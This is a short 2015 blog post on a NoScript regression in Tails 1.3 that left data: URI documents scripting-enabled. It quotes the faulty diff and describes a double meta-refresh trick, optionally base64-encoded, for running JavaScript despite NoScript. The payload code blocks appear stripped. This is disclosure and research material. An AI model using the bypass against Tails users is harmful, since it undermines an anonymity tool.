Title: NoScript script-disabled bypass PoC for Tails 1.3
Date: 2015-03-01 13:30
A couple of days ago, the [Tails]( https://tails.boum.org ) Dev discovered that they missed a
[NoScript]( https://noscript.net ) update for Tails 1.3 by a couple of hours.
It fixes an interesting regression:
> v 2.6.9.15
> =============================================================
> + Fixed regression in 2.6.9.12 causing data: URI documents
> to be scripting-enabled (thanks GOF for tweet)
I know that [Giorgio]( https://maone.net/ ) has some semi-private PoC,
but they are not working great in Tails, so I though about giving a try.
This is the relevant excerpt of the
[diff]( https://addons.mozilla.org/en-US/firefox/files/compare/299406...299702/file/components/noscriptService.js#top )
with `site` indicating a *normal* URL, and `!site` a *special* one, like [data:]( https://tools.ietf.org/html/rfc2397 ):
```diff
- blockIt = !site || (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
+ blockIt = site && (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
```
At first, I was thinking about using the classic thing:
```
clic
```
But it seems that you need to refresh the page to trigger the Javascript.
```
clic
```
This is working! Time to improve it: why not use `refresh` twice?
One time to load our payload, and another one to trigger it.
```html
```
Yay!
If you 're lazy clever, you could of course use the
[HTTP location]( https://en.wikipedia.org/wiki/HTTP_location ) header instead, it'll work too.
And since the `data:` URL-scheme supports base64, you can encode your payload for additional even more l33tness:
```html
```
Hurray, you can now run your javascript-powered 0-days in script-forbidden Tails!
edit: As [said by giorgio]( https://mailman.boum.org/pipermail/tails-dev/2015-March/008293.html ),
this regression isn't that interesting, since it will be considered cross-domain to everything.